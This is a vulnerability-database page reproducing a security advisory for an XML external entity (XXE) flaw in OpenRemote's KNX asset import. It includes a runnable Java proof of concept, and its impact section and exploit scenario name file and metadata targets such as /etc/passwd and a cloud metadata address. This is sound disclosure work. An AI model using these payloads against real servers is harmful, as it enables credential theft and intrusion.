OpenRemote CVE-2026-54640
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
Remote low-complexity import needs a low-privilege authenticated session (PR:L); XXE yields arbitrary file read (C:H) with no write (I:N) and only DTD/SSRF-driven availability effects (A:L).
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
Lifecycle Timeline
2Blast Radius
ecosystem impact- 5 maven packages depend on io.openremote:openremote-agent (2 direct, 3 indirect)
Ecosystem-wide dependent count for version 1.24.2.
DescriptionGitHub Advisory
Summary
The fix for CVE-2026-40882 addressed only the Velbus asset import handler. The KNX asset import handler (KNXProtocol) processes user-uploaded ETS project ZIP files through Saxon XSLT and XMLInputFactory.newInstance() with no XXE protection, allowing any authenticated user to read arbitrary files from the server filesystem (e.g. /etc/passwd, openmrs-runtime.properties, cloud credential files).
Details
Incomplete patch
CVE-2026-40882 was fixed by introducing createSecureDocumentBuilderFactory() in AbstractVelbusProtocol.java with five XXE-blocking features. The parallel asset import handler in KNXProtocol.java was not updated and retains two unprotected XML parsing calls on the same user-controlled data.
Patched file - AbstractVelbusProtocol.java:
private DocumentBuilderFactory createSecureDocumentBuilderFactory() {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
return factory;
}Vulnerable file - KNXProtocol.java, lines 229-249:
// Line 229-230: reads 0.xml from user-uploaded ZIP
InputStream inputStream = KNXProtocol.class.getResourceAsStream(".../ets_calimero_group_name.xsl");
String xsd = IOUtils.toString(inputStream, StandardCharsets.UTF_8);
// Lines 233-245: Saxon XSLT - no XXE protection on the source document
TransformerFactory tfactory = new TransformerFactoryImpl();
Transformer transformer = tfactory.newTransformer(new StreamSource(new StringReader(xsd)));
transformer.transform(
new StreamSource(new StringReader(xml)), // xml = 0.xml from attacker's ZIP
new StreamResult(writer));
// Line 249: XMLInputFactory - no SUPPORT_DTD=false, no IS_SUPPORTING_EXTERNAL_ENTITIES=false
try (final XmlReader r = XmlInputFactory.newInstance()
.createXMLStreamReader(new StringReader(xml))) { ... }Data flow
POST /api/{realm}/agent/{agentId}/import (authenticated user, PR:L)
→ AgentResourceImpl.doProtocolAssetImport(fileData)
→ KNXProtocol.startAssetImport(byte[] fileData)
→ ZipInputStream reads 0.xml from attacker-controlled ETS ZIP
→ Saxon TransformerFactoryImpl.transform(StreamSource(0.xml)) ← XXE stage 1
→ XmlInputFactory.newInstance().createXMLStreamReader(xml) ← XXE stage 2
→ external entity resolved → arbitrary file readComparison with patched code
| Handler | XML parser | DTD disabled | Status |
|---|---|---|---|
AbstractVelbusProtocol | DocumentBuilderFactory | ✅ 5 features set | Patched (CVE-2026-40882) |
KNXProtocol | Saxon + XMLInputFactory | ❌ none set | Not patched |
PoC
No full OpenRemote installation required. The following reproduces the vulnerable XML processing chain using the exact same library versions.
Requirements: Java 17+, Maven 3.8+
pom.xml dependency:
<dependency>
<groupId>net.sf.saxon</groupId>
<artifactId>Saxon-HE</artifactId>
<version>12.9</version>
</dependency>Exploit.java:
import net.sf.saxon.TransformerFactoryImpl;
import javax.xml.stream.*;
import javax.xml.transform.*;
import javax.xml.transform.stream.*;
import java.io.*;
import java.nio.file.*;
public class Exploit {
public static void main(String[] args) throws Exception {
// Sentinel file - proves arbitrary file read
Path sentinel = Files.createTempFile("openremote_xxe_proof_", ".txt");
String tag = "OPENREMOTE_KNX_XXE_" + System.currentTimeMillis();
Files.writeString(sentinel, tag);
String maliciousXml =
"<?xml version=\"1.0\"?>\n" +
"<!DOCTYPE root [\n" +
" <!ENTITY xxe SYSTEM \"file://" + sentinel.toAbsolutePath() + "\">\n" +
"]>\n" +
"<root><data>&xxe;</data></root>";
// Stage A: XMLInputFactory (KNXProtocol.java:249 - no security config)
XMLInputFactory factory = XMLInputFactory.newInstance();
XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(maliciousXml));
StringBuilder sb = new StringBuilder();
while (reader.hasNext()) {
int e = reader.next();
if (e == XMLStreamConstants.CHARACTERS) sb.append(reader.getText());
}
System.out.println("Stage A result: " + sb.toString().trim());
// Stage B: Saxon TransformerFactoryImpl (KNXProtocol.java:233-245)
String xsl = "<?xml version=\"1.0\"?>" +
"<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">" +
"<xsl:output method=\"text\"/>" +
"<xsl:template match=\"/\"><xsl:value-of select=\"root/data\"/></xsl:template>" +
"</xsl:stylesheet>";
TransformerFactory tf = new TransformerFactoryImpl();
StringWriter writer = new StringWriter();
tf.newTransformer(new StreamSource(new StringReader(xsl)))
.transform(new StreamSource(new StringReader(maliciousXml)), new StreamResult(writer));
System.out.println("Stage B result: " + writer.toString().trim());
Files.deleteIfExists(sentinel);
}
}Build and run:
mvn clean package -q
java -jar target/openremote-xxe-1.0.jarVerified output (JDK 21, Linux):
Stage A result: OPENREMOTE_KNX_XXE_1780611779589
Stage B result: OPENREMOTE_KNX_XXE_1780611779589Both stages print the sentinel file's contents, confirming that an external entity referencing a local file is resolved without restriction.
Impact
Vulnerability type: XML External Entity (XXE) injection leading to arbitrary file read and potential server-side request forgery (SSRF).
Who is impacted: Any OpenRemote deployment that exposes the Manager API to authenticated users. The import endpoint requires only a valid session (PR:L), not administrator access. An attacker with a regular account in any realm can exploit this to read files accessible to the JVM process user, including:
/etc/passwd- user enumeration- Application configuration files containing database credentials or API keys
- Cloud provider metadata endpoints via SSRF (
http://169.254.169.254/...) - Internal service endpoints reachable from the server
The vulnerability is present in KNXProtocol, a built-in protocol handler shipped with every OpenRemote installation that includes the agent module. No special configuration is required to be exposed to this attack.
Articles & Coverage 1
AnalysisAI
Arbitrary file read in OpenRemote's KNXProtocol asset-import handler lets any authenticated user (PR:L, any realm) upload a malicious ETS project ZIP whose 0.xml is parsed via Saxon XSLT and XMLInputFactory without XXE hardening, resolving external entities to exfiltrate server files such as /etc/passwd, openmrs-runtime.properties, and cloud credential files, with SSRF against internal endpoints as a secondary impact. This is an incomplete-fix regression of CVE-2026-40882, which only hardened the parallel Velbus handler and left KNXProtocol's two XML parsing calls unprotected. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires a valid authenticated OpenRemote session in any realm (PR:L - regular user, not administrator) and network reachability to the Manager API import endpoint POST /api/{realm}/agent/{agentId}/import. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Signals are largely consistent and point to a genuine, actionable priority for OpenRemote operators, though not an internet-wide emergency. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers or obtains any low-privilege OpenRemote account in any realm, crafts an ETS project ZIP whose 0.xml declares a DOCTYPE with an external entity pointing at file:///etc/passwd (or http://169.254.169.254/latest/meta-data/ for cloud credentials), and POSTs it to the KNX agent import endpoint. The Saxon XSLT transform and StAX reader resolve the entity and return the file contents in the response. … |
| Remediation | Apply the vendor fix: upgrade to the OpenRemote build containing commit c28d3c60ebc2da68d9b6c4a6d7a5ad875a255ee9 (Patch available per vendor advisory; a specific released version tag is not confirmed in the provided data), which extends the secure-parser configuration to KNXProtocol. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify and inventory all OpenRemote deployments; determine which versions and configurations use the KNXProtocol asset import handler. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-7v6w-c3f4-9wpq